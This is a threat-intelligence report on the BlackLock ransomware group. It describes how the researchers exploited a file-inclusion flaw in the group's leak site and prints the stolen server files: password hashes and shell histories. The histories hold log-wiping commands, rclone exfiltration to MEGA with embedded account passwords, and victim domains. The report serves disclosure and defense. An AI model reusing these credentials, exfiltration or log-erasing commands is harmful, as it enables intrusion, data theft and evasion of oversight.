Cyber Threat Intelligence

25 Mar 2025

ransomware, dark web, hacking, malware, OPSEC, DLS, TOR, cybercrime

Introduction

Dubbed “BlackLock” (aka “El Dorado” or “Eldorado“), the ransomware-as-a-service (RaaS) outfit has existed since March 2024. In Q4 of last year, it increased its number of data leak posts by a staggering 1,425% quarter-on-quarter. According to independent reporting, a relatively new group has rapidly accelerated attacks and could become the most dominant RaaS group in 2025.

Fortunately, it will not happen due to certain events happening “behind the scenes.” As you may know, Christmas and Winter Holidays are the best times for cybercriminals to attack, defraud, and extort victims globally. But in some cases, they may expect unexpected gifts too. Around that time, Resecurity identified a vulnerability present at the Data Leak Site (DLS) of BlackLock in the TOR network – successful exploitation of which allowed our analysts to collect substantial intelligence about their activity outside of the public domain.

Since that time, our analysts from the HUNTER team have been covertly acquiring critical and previously undisclosed artifacts related to threat actors’ network infrastructure, logs, ISPs and hosting providers involved, timestamps of logins, associated file-sharing accounts at MEGA, the group created to store stolen data from the victims (which later got published via DLS in TOR). A successful compromise of BlackLock’s DLS allowed to uncover a trove of information about the threat actors and their Modus Operandi (MO), but more importantly, to predict and prevent some of their planned attacks and protect undisclosed victims by alerting them.

It is not enough to look at ransomware groups and design fancy reports counting the number of victims suffering from their activity. Resecurity believes the proactive, practical approach to disrupting cybercriminal chains is the key catalyst to combat ransomware activity worldwide. Blacklock ransomware compromise is a unique case when offensive cyber, combined with threat intelligence research capabilities, facilitated investigation workflow to uncover critical insights and target the actors regardless of how sophisticated their operations are.

Local File Include (LFI) Vulnerability Exploitation:

https://player.vimeo.com/video/1069108691?badge=0&autopause=0&player_id=0&app_id=58479

Historical Retrospective

As of February 10, 2025, we identified 46 victims involving organizations from different segments of the economy, including electronics, academia, religious organizations, defense, healthcare, technology, IT/MSP vendors, and government agencies. The impacted organizations were based in Argentina, Aruba, Brazil, Canada, Congo, Croatia, Peru, France, Italy, Spain, the Netherlands, the United States, the United Kingdom, and the UAE.

Resecurity has a reason to believe the actors successfully compromised a much more significant number of victims who were currently undisclosed due to ongoing extortion attempts (by the actors) or could be published.

At least one victim from the critical infrastructure field has not been published at the DLS, and several others have been removed from the listing. As one key communication method, the group has leveraged the email account registered via Cyberfear.com, an anonymous email service also available in TOR.

January 14, 2025: Threat actors created a posting at a prominent underground community (forum) dedicated to ransomware called “RAMP.” In that posting, they announced the launch of an underground affiliate network, inviting other cybercriminals to participate in monetizing their malicious activity by planting ransomware (malicious code delivered as binary) and selling compromised access.

The posting encouraged other cybercriminals to contact the group via private message (PM) via a forum. Notably, the posting was written in Russian and Chinese language:

The rules of the BlackLock affiliate platform warned cybercriminals who joined it not to target victims based in countries of the BRICS alliance, including Russia and China, as well as the Commonwealth of Independent States (CIS), which includes countries of post-Soviet period. While the latter is a typical “rule” for cybercriminals originating from modern Eastern Europe, the reference to China is noteworthy.

Omne Trium Perfectum

The actor behind BlackLock Ransomware, under the alias “$$$,” has links to two other ransomware projects: El Dorado and Mamona Ransomware. This is a unique case when the same ransomware operator could manage three projects, successfully transitioning from one to another. For example, following a successful attack against New River Electrical from Ohio, El Dorado Ransomware actors also targeted the College of Veterinary Medicine (Kansas State University) and the City of Pensacola (Florida), which later got published at BlackLock Ransomware DLS.

The web interface of El Dorado Ransomware DLS was different from BlackLock Ransomware‘s, but they shared an almost identical list of victims. This overlap may confirm a strong connection between these ransomware projects.

El Dorado DLS:

BlackLock DLS:

Independent cybersecurity researchers have also confirmed the connection between BlackLock Ransomware and El Dorado Ransomware in code and ransomware notes. It is very common for ransomware operators to rebrand their projects – in some cases, this is used as an OPSEC measure to confuse investigators.

March 11, 2025 – the actor “$$$” behind BlackLock Ransomware announced the launch of a new project called Mamona Ransomware.

Vulnerability in Data Leak Site (DLS)

Resecurity identified a certain misconfiguration in the Data Leak Site (DLS) of BlackLock Ransomware, leading to clearnet IP addresses disclosure related to their network infrastructure behind TOR hidden services (hosting them) and additional service information. The collected data allowed us to assist with further investigation and disruption of this cybercriminal activity.

The successful exploitation of Local File Include (LFI) vulnerability allowed the collection of sensitive server-side information, including configuration files and credentials.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
tss:x:59:59:Account used for TPM access:/:/sbin/nologin
polkitd:x:998:996:User for polkitd:/:/sbin/nologin
clevis:x:997:993:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
unbound:x:996:992:Unbound DNS resolver:/etc/unbound:/sbin/nologin
libstoragemgmt:x:995:991:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
dnsmasq:x:990:990:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
cockpit-ws:x:989:989:User for cockpit web service:/nonexisting:/sbin/nologin
cockpit-wsinstance:x:988:988:User for cockpit-ws instances:/nonexisting:/sbin/nologin
sssd:x:987:987:User for sssd:/:/sbin/nologin
setroubleshoot:x:986:986::/var/lib/setroubleshoot:/sbin/nologin
chrony:x:985:985::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dataleak:x:1000:1000::/home/dataleak:/bin/bash
toranon:x:984:984:Tor anonymizing user:/var/lib/tor:/sbin/nologin
mongod:x:983:983:mongod:/var/lib/mongo:/bin/false
nginx:x:982:982:Nginx web server:/var/lib/nginx:/sbin/nologin</p>

Resecurity invested substantial time in hash-cracking threat actors’ accounts to take over the infrastructure.

etc/shadow

root:$6$QP1qCdMKSRh/Gl4j$XI2846jhEIMap35J0lVz7nAkg0FC60AB9nI.UPtj3rjuY138YdcOyGYwLNzsD1oSru2idSZOhBb/yFB9gBraK.:20035:0:99999:7:::
bin:*:19448:0:99999:7:::
daemon:*:19448:0:99999:7:::
adm:*:19448:0:99999:7:::
lp:*:19448:0:99999:7:::
sync:*:19448:0:99999:7:::
shutdown:*:19448:0:99999:7:::
halt:*:19448:0:99999:7:::
mail:*:19448:0:99999:7:::
operator:*:19448:0:99999:7:::
games:*:19448:0:99999:7:::
ftp:*:19448:0:99999:7:::
nobody:*:19448:0:99999:7:::
dbus:!!:20033::::::
systemd-coredump:!!:20033::::::
systemd-resolve:!!:20033::::::
tss:!!:20033::::::
polkitd:!!:20033::::::
clevis:!!:20033::::::
unbound:!!:20033::::::
libstoragemgmt:!!:20033::::::
dnsmasq:!!:20033::::::
cockpit-ws:!!:20033::::::
cockpit-wsinstance:!!:20033::::::
sssd:!!:20033::::::
setroubleshoot:!!:20033::::::
chrony:!!:20033::::::
sshd:!!:20033::::::
tcpdump:!!:20033::::::
blog:$6$R5NXVtC2Qt/t7cuH$z7Y9llp1iG0Eq98yrjaLyoTLaZXK6ZCHrX2ICCDiUCq93miekvsBELG0HSN7Llng2toyQkAla0mUSDC/kO880/:20033:0:99999:7:::
dataleak:$6$Ol3oM4fOHNoJCjD8$gRfsRTaw7JQDDO0FwhKFSmLuxJwZ5UdNqL4OrDXlbL4uSv.Xzq4KxwxYQO.nDL5cuoiVTe5zwo0yaQX952gbO/:20035::::::
toranon:!!:20035::::::
mongod:!!:20035::::::
nginx:!!:20035::::::</p>

The acquired history of commands was probably one of the biggest OPSEC failures of Blacklock Ransomware. The collected artifacts included copy-pasted credentials the key actor managing the server used and a detailed chronology of victims’ data publication.

.bash_history
lsblk
df -h
free -h
passwd root
exit
w
last
cat /dev/null > /var/log/wtmp 
exit
last
cat /dev/null > /var/log/wtmp 
exit
last
cat /etc/issue
lsblk 
vgs
mount
df -h
yum update
cat /etc/centos-release 
yum update
yum install epel-release
yum update
yum install screen mc
screen -U
last
exit
last
screen -U -r
last
exit
systemctl restart otr
systemctl restart tor
systemctl status tor
systemctl restart tor
systemctl status tor
systemctl restart tor
systemctl status tor
exit
adduser blog
passwd blog
ifconfig
yum install fail2ban
yum install rsync
man rsync
su blog
su dataleak
exit
systemctl restart tor
exit
last
cat /dev/null > /var/log/wtmp 
screen -U -r
last
w
exit
df -h
mc
exit
wget 
<figure><img src="https://myrtlebeachcustomhomebuilder.com/images/logo-flip.png" data-image="4tun4dh44709"></figure>
exit
mc
exit
last
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
ll KEIZERS.CA 
mc
exit
w
cat /dev/null > /var/log/wtmp 
screen -U -r
last
exit
mont
mount
chown blog Data 
chmod 700 .ssh 
vi authorized_keys
vi authorized_keys 
ll
vipw
mv blog dataleak
ll
ls -la
ll
ls -la
passwd dataleak
ifconfig
ip link
ethtool eno1
df -h
yum install rclon
man rclone
rclone help
rclone test
rclone help sync
rclone sync
rclone sync -h
df -h
yum install tor
systemctl enable tor
systemctl start tor
systemctl status tor
chmod 700 backend 
ll
yum isntall nodejs
yum install nodejs
yum install mongo
yum install mongod
yum install mongo
vi /etc/yum.repos.d/mongodb-org.repo
yum update
yum install mongodb-org
yum update
yum install mongodb-org
systemctl status mongod
systemctl enable mongod
systemctl start mongod
yum update
systemctl status mongod
tar zxvf b.tgz 
npm install mongojs
dnf module list nodejs
dnf module enable nodejs:20
npm install mongojs
yum install nodejs 
node -v
npm install -g mongojs
npm install -g bind
ln -s /usr/local/lib/node_modules/bind bind 
ln -s /usr/local/lib/node_modules/mongojs mongojs 
./server2.js
yum install nginx
vi data-leak
vi data-leak-test
systemctl status nginx
systemctl enable nginx
systemctl start nginx
systemctl status nginx
./server2.js
iptables -v -n -L
systemctl status firewalld
systemctl disable firewalld
systemctl stop firewalld
systemctl status firewalld
iptabes -L -v -n
iptables -v -n -L
ifconfig
systemctl restart nginx
netstat -antp | grep nginx
systemctl restart nginx
systemctl status nginx
systemctl restart nginx
systemctl status nginx
tar zxvf f.tgz 
systemctl restart nginx
systemctl status nginx
ifconfig
./server2.js
ll
chgrp-r  www *
chgrp -R www *
ll
vipw
chgrp -R nginx *
ll
chown -R dataleak *
ll
vipw
ll
chmod 750 
chmod 750 backend 
ll
chgro nginx backend 
ll
chgrp nginx backend 
ll
./server2.js
ll
chgrp nginx www 
ll
chown root *
;;
ll
chgrp root data-leak index.html index2.html package-lock.json package.json server.js server2.js test.js 
ll
chgrp root node_modules 
ll
systemctl restart nginx
systemctl status nginx
mongoimport --db dataleak --collection projects < projects.js 
mongosh dataleak
mongo dataleak
setsebool -P httpd_can_network_connect 1
grep nginx audit.log 
./server2.js
ll
grep nginx audit.log 
getsebool -a | grep httpd
setsebool httpd_can_network_connect on -P
getsebool -a | grep httpd
grep tor audit.log 
sudo setenforce 0
./server2.js
ll
./server2.js
ll
./server2.js
mongo dataleak
./server2.js
mongo dataleak
./server2.js
mongo dataleak
./server2.js
systemctl restart nginx
tail -f access.log 
df -h
mv data-leak-test data-leak
tar zxvf d.tgz 
ll
vipw
chown -R toranon data-leak 
ll
yum install obfs4
ifconfig
ping6 2600::
netstat -nr
ping6 2001:4860:4860::8888
git
yum install git
git clone git@gitlab.torproject.org:tpo/anti-censorship/pluggable-transports/lyrebird.git
git clone <a href="https://gitlab.torproject.org/tpo/anti-censorship/pluggable-transports/lyrebird.git" rel="nofollow">https://gitlab.torproject.org/tpo/anti-censorship/pluggable-transports/lyrebird.git</a>
tar zxvf l.tgz 
yum install go
make build
go get -d
go list -m -u all
go get -d ./...
make build
go get -d
make
yum install Makefile
yum install make
make build
./lyrebird
tail -f messages 
less torrc 
./lyrebird -h
tar zxvf s.tgz 
make
make build
go get -d ./...
make build
go get
go build
mv client snowflake
./snowflake
./snowflake -h
./lyrebird -h
df -h
mmongosh dataleak
mongo dataleak
ll
mongo dataleak
ll
mongo dataleak
ll
mongo dataleak
ll
mongo dataleak
ll
mongo dataleak
pwd
df -h
ifconfig
passwd dataleak
ll
passwd dataleak
mongo dataleak
systemctl restart nginx
systemctl status nginx
netstat -antp | grep nginx
netstat -antp | grep tor
netstat -antp | grep nginx
tail -f messages 
cat /dev/null > error.log 
cat /dev/null > access.log 
tail -f access.log 
df -h
w
ll pensacolacitygov 
df -h
mongo dataleak
rm -rf hichoice_ERRORE 
df -h
man sshd_config 
w
rclone --version
w
whereis rclone
echo root209370293683jkynrnh,d | md5sum 
passwd
mv index2.html index.html 
mv server2.js server.js 
ll
w
less data-leak 
ll
vi index.html 
mongo dataleak
df -h
w
ll | wc -l
mongo dataleak
ll
mongo dataleak
systemctl restart nginx
ll
chgrp nginx dataleak 
ll
chmod 750 dataleak 
ll
ps aux | grep ngin
exit
w
last
cat /dev/null > /var/log/wtmp 
screen -u -r
screen -U -r
exit
cat /dev/null > /var/log/wtmp 
w
df -h
screen -U -r
exit
cat /dev/null > /var/log/wtmp
screen -U -r
exit
cat /dev/null > /var/log/wtmp 
w
screen -U -r
last
exit
w
screen -U -r
yum install rbenv
cd
su uuid_chat
exit
last
cat /dev/null > /var/log/wtmp 
w
screen -U -r
eit
exit
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
df -h
wget 
<figure><img src="https://tiendascarrion.com/cdn/shop/files/Screen_Shot_2019-06-04_at_4.12.20_PM_180x.png?v=1613523136" data-image="84zrmtw3nkcv"></figure>
mv Screen_Shot_2019-06-04_at_4.12.20_PM_180x.png\?v\=1613523136 carrion.png
wget 
<figure><img src="http://lalucky.com/wp-content/uploads/2019/11/logo.png" data-image="ju8z6q873h8r"></figure>
mv logo.png lalucky-logo.png
ps axf
w
mc
exit
cat /dev/null > /var/log/wtmp 
ifconfig
screen -U -r
last
cat /dev/null > /var/log/wtmp 
w
exit
cat /dev/null > /var/log/wtmp 
screen -U -r
last
exit
last
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
w
last
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
su dataleak
exit
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
last
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
lasst
last
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
last
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
systemctl status tor
systemctl status nginx
systemctl restart nginx
ll
systemctl restart nginx
df -h
setsebool -P httpd_can_network_connect on
sestatus
setenforce 0
sestatus
echo 0 > /selinux/enforce
last
cat /dev/null > /var/log/wtmp 
screen -U -r
last
screen -U
mc
reboot
cd /home/backend/
ll
./server.js 
cd /home/backend
./server.js 
last
sestatus 
screen -U
netstat -antp | grep nginx
systemctl status tor
cp node-backend.service
cp puma-root-panel.service node-backend.service
systemctl status firewalld
iptables -n -v -L
reboot
last
ps axf
systemctl status node-backend.service 
systemctl start node-backend.service 
systemctl status node-backend.service 
systemctl stop node-backend.service 
systemctl status node-backend.service 
systemctl enable node-backend.service 
systemctl status node-backend.service 
screen -U
clear
last
cat /dev/null > /var/log/wtmp 
exit
cat /dev/null > /var/log/wtmp 
screen _U -r
screen -U -r
exit
last
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
last
cat /dev/null > /var/log/wtmp 
screen -U
last
exit
last
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
cat /dev/null > /var/log/wtmp 
screen -U -x
screen -U -r
exit
last
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
last
cat /dev/null > /var/log/wtmp 
w
screen -U -r
last
exit
last
cat /dev/null > /var/log/wtmp 
screen -U -r
last
exit
last
w
cat /dev/null > /var/log/wtmp 
screen -U -r
last
exit
cat /dev/null > /var/log/wtmp 
screen -U -x
screen -U -r
last
exit
last
cat /dev/null > /var/log/wtmp 
screen -U -r
last
exit
last
cat /dev/null > /var/log/wtmp 
screen -U -r
exit
cat /dev/null > /var/log/wtmp 
screen _U -r
screen -U -r
exit
last
cat /dev/null > /var/log/wtmp 
screen -U -r
exit

Ironically, one of the passwords copied by one of the actors managing the BlackLock Ransomware server was valid for several other associated accounts used by the group.

As an additional security measure, the DLS server was also protected by a digital certificate. The authorization on the server was not possible only through a credentials set; an actual digital certificate was required to be issued by one of the administrators.

~/.ssh/authorized_keys file

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDj+d9zMm7DY+ooflblhb8b85Iq6mzwZzt7bAheyyZjcESMYWp3g6KJtZr20P3gJcN8G0KlGZ6ZrpxhfIvNAa1GQsdH4e84fg2ciTkDTudiP6aL90cR8paMoZnXvarrMg2S3legm8j1oi4B2L8xiAsyK6VfauY9Ikf4BQkyXzk9lKPhywOdmR66SbGZJP6jzFmp0hNWoirnGOs8bw413xfaxL6VRI4wqFE7ccf6wUleX7x4SnKrF7QNMr0S6EWf8L/przeSrTHCXR/lOmFGurpsXn3CNmM2i5/GLGdjaAvklHd+/niIOBXN1KuJR0mDDRpka6KIke0YbPwIjq5Fgvtn root@localhost

Integration with TOR was arranged using Lyrebird—obfs4proxy, which implements several pluggable transport protocols, including obfs4, meek, and WebTunnel.

One of the key mechanisms of stolen data transfers was arranged via MEGA, a popular file-sharing service. Blacklock Ransomware has created multiple accounts to facilitate the storage of stolen data from the victims.

To manage it effectively, Blacklock Ransomware used the clone utility, and in some cases, it also installed the MEGA client directly on the victims.

<p>ls
cd ../
ls
cd /home/blog/Data
cd ../../
ls
cd home/
ls
cd dataleak/
ls
cd Data_Download/
ls
ls -la
cd ../../
ls
cd ../
ls
rclone
cd op
cd opt/
ls
wget <a href="https://downloads.rclone.org/v1.68.1/rclone-v1.68.1-linux-amd64.zip" rel="nofollow">https://downloads.rclone.org/v1.68.1/rclone-v1.68.1-linux-amd64.zip</a>
ls
cd ../
ls
cd tmp
ls
wget <a href="https://downloads.rclone.org/v1.68.1/rclone-v1.68.1-linux-amd64.zip" rel="nofollow">https://downloads.rclone.org/v1.68.1/rclone-v1.68.1-linux-amd64.zip</a>
unzip rclone-v1.68.1-linux-amd64.zip
sudo mv rclone-v1.68.1-linux-amd64/rclone /usr/local/bin/
rclone --version
ls
rm rclone-v1.68.1-linux-amd64.zip 
ls
cd rclone-v1.68.1-linux-amd64/
ls
./rclone copy --progress --transfers=40 --checkers=20 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --use-mmap --exclude "*.exe" --exclude "*.iso" --mega-user sopajelessei-5488@yopmail.com --mega-pass TEM5j59bRtlNiWsPW7CXGuaHEWgaGCygzgDL0ROmKamkZg :mega:PHXCMP.com /home/dataleak/Data_Download/PHXCMP.com
./rclone copy --progress --transfers=40 --checkers=20 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --use-mmap --exclude "*.exe" --exclude "*.iso" --mega-user sopajelessei-5488@yopmail.com --mega-pass TEM5j59bRtlNiWsPW7CXGuaHEWgaGCygzgDL0ROmKamkZg :mega:nationshomes /home/dataleak/Data_Download/myrtlebeachcustomhomebuilder.com
./rclone copy --progress --transfers=40 --checkers=20 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --use-mmap --exclude "*.exe" --exclude "*.iso" --mega-user zubinnecrouzo-6860@yopmail.com --mega-pass YMqCVhGx-IVFX3EN1W7yv24ch8XNtprEz4F83YeL8_HookIG_UeiSx95xdgIBuDp :mega:SYMBISYSTEMS /home/dataleak/Data_Download/symbisystems.com
rsync -avr data_leak@45.155.173.96:~/site/public/Data_Download .
cd
pwd
rsync -avr data_leak@45.155.173.96:~/site/public/Data_Download .
exit
ls
cd ../
ls
ls dataleak/
ls dataleak/Data_Download/
ls dataleak/Data_Download/ -la
cd ../../../opt/
ls
cd ../tmp/rclone-v1.68.1-linux-amd64/
./rclone copy --progress --transfers=100 --checkers=40 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --mega-user mega080mega@gmail.com --mega-pass boGl51ylqWbtK2ePaBpO7DZWKc4WJV3SG7GPU_Fd9x9Ug0rGEoXmvEQ3wogEVmpj :mega:MULLENWYLIE "/home/dataleak/Data_Download/MULLENWYLIE"
./rclone 
./rclone obscure pNzZzf+p#so3s7UOcU(kO)7Hr;vw(XAi
./rclone obscure 'pNzZzf+p#so3s7UOcU(kO)7Hr;vw(XAi'
./rclone copy --progress --transfers=100 --checkers=40 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --mega-user mega080mega@gmail.com --mega-pass OEh9sc9-Uwga0RCP0V5ncVSW60N6PyhubrTwJeVX0jUuZNXEIWGp2toyxiY4Llw5 :mega:MULLENWYLIE "/home/dataleak/Data_Download/MULLENWYLIE"
./rclone copy --progress --transfers=100 --checkers=40 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --mega-user mega080mega@gmail.com --mega-pass boGl51ylqWbtK2ePaBpO7DZWKc4WJV3SG7GPU_Fd9x9Ug0rGEoXmvEQ3wogEVmpj :mega:MULLENWYLIE "/home/dataleak/Data_Download/MULLENWYLIE"
./rclone copy --progress --transfers=100 --checkers=40 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --mega-user mega080mega@gmail.com --mega-pass boGl51ylqWbtK2ePaBpO7DZWKc4WJV3SG7GPU_Fd9x9Ug0rGEoXmvEQ3wogEVmpj :mega:Data_Download "/home/dataleak/Data_Download"
ls /home/dataleak/Data_Download/
ls /home/dataleak/Data_Download/ -la
./rclone copy --progress --transfers=100 --checkers=40 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --mega-user mega080mega@gmail.com --mega-pass boGl51ylqWbtK2ePaBpO7DZWKc4WJV3SG7GPU_Fd9x9Ug0rGEoXmvEQ3wogEVmpj :mega:Data_Download "/home/dataleak/Data_Download"
./rclone copy --progress --transfers=100 --checkers=60 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --use-mmap --mega-user seheziyivei-9142@yopmail.com --mega-pass ctQ3zYWNDp8n8HIQfxeWNnLH_zJOkQLsEMgf7ik3x7bt ":mega:Data_Download" "/home/dataleak/Data_Download"
cd ../
ls
cd ../
ls
cd tmp/
ls
cd rclone-v1.68.1-linux-amd64/
./rclone copy --progress --transfers=100 --checkers=60 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --use-mmap --mega-user seheziyivei-9142@yopmail.com --mega-pass ctQ3zYWNDp8n8HIQfxeWNnLH_zJOkQLsEMgf7ik3x7bt ":mega:Data_Download" "/home/dataleak/Data_Download"
./rclone copy --progress --transfers=100 --checkers=40 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --mega-user mega080mega@gmail.com --mega-pass boGl51ylqWbtK2ePaBpO7DZWKc4WJV3SG7GPU_Fd9x9Ug0rGEoXmvEQ3wogEVmpj :mega:Data_Download "/home/dataleak/Data_Download"
cd home/dataleak/Data_Download
cd /home/dataleak/Data_Download/
ls
ls -la
cd .././../../
ls
cd tmp/rclone-v1.68.1-linux-amd64/
ls
./rclone 
./rclone copy --progress --transfers=40 --checkers=20 --drive-chunk-size 128M --max-backlog 999999 --fast-list --use-mmap --exclude "*.exe" --exclude "*.iso" --mega-user sopajelessei-5488@yopmail.com --mega-pass TEM5j59bRtlNiWsPW7CXGuaHEWgaGCygzgDL0ROmKamkZg ":mega:Data_Download" "home/dataleak/Data_Download"
./rclone copy --progress --transfers=100 --checkers=60 --drive-chunk-size 128M --max-backlog 999999 --fast-list --use-mmap --exclude "*.exe" --exclude "*.iso" --mega-user sopajelessei-5488@yopmail.com --mega-pass TEM5j59bRtlNiWsPW7CXGuaHEWgaGCygzgDL0ROmKamkZg ":mega:Data_Download" "home/dataleak/Data_Download"
./rclone obscur 'Guiknbv#ffc@f54R3@'
./rclone 
./rclone obscure 'Guiknbv#ffc@f54R3@'
./rclone copy --progress --transfers=40 --checkers=20 --drive-chunk-size 128M --max-backlog 999999 --fast-list --use-mmap --exclude "*.exe" --exclude "*.iso" --mega-user sopajelessei-5488@yopmail.com --mega-pass z8asHp87-_8LBGtgDgln9ea5zCwz0ZjlDyPIj1d2ofj2rQ ":mega:Data_Download" "home/dataleak/Data_Download"
./rclone copy --progress --transfers=100 --checkers=60 --drive-chunk-size 128M --max-backlog 999999 --fast-list --us6-mmap --exclude "*.exe" --exclude "*.iso" --mega-user sopajelessei-5488@yopmail.com --mega-pass z8asHp87-_8LBGtgDgln9ea5zCwz0ZjlDyPIj1d2ofj2rQ ":mega:Data_Download" "home/dataleak/Data_Download"
./rclone copy --progress --transfers=100 --checkers=60 --drive-chunk-size 128M --max-backlog 999999 --fast-list --use-mmap --exclude "*.exe" --exclude "*.iso" --mega-user sopajelessei-5488@yopmail.com --mega-pass z8asHp87-_8LBGtgDgln9ea5zCwz0ZjlDyPIj1d2ofj2rQ ":mega:Data_Download" "home/dataleak/Data_Download"
ls -la
ls /home/dataleak/Data_Download/ -la
ls /home/dataleak/ -la
ls /home/dataleak/Data_Download/ -la
cd /home/
ls
cd dataleak/
ls
cd Da
ls
cd Data_Download/
ls
uname -a
sudo apt install mlocate
apt install mlocate
sudo find / -type d -name "CARRION" 2>/dev/null
find / -type d -name "CARRION" 2>/dev/null
find / -type d -name "CARRION.com" 2>/dev/null
cd /tmp/
ls
cd rclone-v1.68.1-linux-amd64/
ls
cd home/
ls
cd /tmp/rclone-v1.68.1-linux-amd64/home/dataleak/Data_Download/
ls
mv /tmp/rclone-v1.68.1-linux-amd64/home/dataleak/Data_Download/* /home/dataleak/Data_Download/
ls /tmp/rclone-v1.68.1-linux-amd64/home/dataleak/Data_Download/
ls /home/dataleak/Data_Download/ -la
mongo dataleak
cd
ll
cd /home/dataleak/Data_Download
ll
cd 
ll
cd Data_Download/
ll
cd NRE
ll
cd ..
ll
chmod +r NRE
ll
chmod -r NRE
ll
chown root:root *
ll
cd ..
ll
cd Data_Download/
ll
chown dataleak NRE
touch test
ll
cd NRE
ll
ls -la
cat DirlisterList.txt
top
ll
cd ..
cd NRE
cat NRE/DirlisterList.txt
exi
exit
ls
ls Data_Download/
cd ../
ls
cd ../
ls
cd tmp
ls
rclone --version
rclone 
cd ../
ls
ls home/
ls
cd home/dataleak/
ls
cd Data_Download/
ls
rclone copy --progress --transfers=100 --checkers=50 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --mega-user seheziyivei-9142@yopmail.com --mega-pass lYjZGddClgLrdt0Y8lInjX-LTDRMoXeIAcZsBWFohAiq ":mega:Data_Download" "/home/dataleak/Data_Download"
ls
ls -la
rclone copy --progress --transfers=100 --checkers=50 --drive-chunk-size 128M --use-mmap --max-backlog 999999 --fast-list --mega-user seheziyivei-9142@yopmail.com --mega-pass lYjZGddClgLrdt0Y8lInjX-LTDRMoXeIAcZsBWFohAiq ":mega:acumengroup.us" "/home/dataleak/Data_Download"</p>

Resecurity has acquired substantial intelligence about email accounts associated with MEGA folders managed by Blacklock Ransomware.

There were identified at least eight accounts created by the group in different timeframes:

  • sopajelessei-5488@yopmail[.]com
  • zubinnecrouzo-6860@yopmail[.]com
  • mega080mega@gmail[.]com
  • seheziyivei-9142@yopmail[.]com
  • emptyzubinnecrouzo-6860@yopmail[.]com
  • gregorysears703@yahoo[.]com
  • crelleuyeffeufrau-2050@yopmail[.]com
  • kirefreujepre-1654@yopmail[.]com

Using rclone utility, BlackLock ransomware actors were moving troves of stolen data between MEGA accounts and DLS.

MEGA accounts have shared the stolen data from current and historical victims. At some point, the actors also used MEGA as a backup method.

Some accounts got wiped after some time and re-used to upload new stolen data.

January 10, 2025 – Resecurity has contacted the Canadian Centre for Cyber Security to share intelligence about planned data for publication from one of the victims based in Canada. Leveraging gained access to BlackLock Ransomware infrastructure, our team collected information about the stolen data 13 days before its publication by the threat actors.

January 16, 2025—Resecurity reached out to CERT-FR/ANSSI to share available intelligence about planned data publication from one of the victims based in France. Leveraging the access gained, our team could collect knowledge of the stolen data two days before publication by the threat actors and share it with the appropriate authorities.

In that example, BlackLock Ransomware targeted a primary legal services provider.

The observed exfiltrated data belonged to the victim and multiple customers from the EU and abroad using their services.

Notably, during the exfiltration, the actors deployed the MEGA client on the victim’s server to upload data covertly and evade detection.

Resecurity leveraged compromised accounts to observe the possible origin of threat actor activity.

The most notable IP addresses were originating from China and Russia. Of course, the actors could use proxies and VPN servers anonymously, but some disclosed IPs showed particular trends.

One of the most valuable files is log files revealing the IP addresses of the bad actors from the server side (SSH). Some of them overlapped with IP addresses seen for MEGA login sessions.

IP 185.147.124.54

IP 218.92.0.252

On January 26, 2025, the actors created an additional MEGA account and added it to the stolen data publication workflow.

Resecurity monitored the accounts to detect new compromised data and identify and alert victims at an early stage. In total, our threat intelligence analysts collected over 7 TB of compromised data belonging to various victims.

Ransomware Wars for Fun and Profit

February 26, 2025 – Resecurity established contact with a BlackLock Ransomware representative managing the affiliate network via TOX IM.

March 01, 2025 – the actor passed a ZIP with ransomware binaries along with a ransomware note:

The provided ZIP contained six binaries, a ransomware payload designed for Windows, Linux, and FreeBSD, and one bash script for ESXi.

After reverse engineering, multiple code fragments were almost identical to those used by another underground conglomerate – DragonForce Ransomware. Resecurity has published a detailed reverse engineering report describing the key modules.

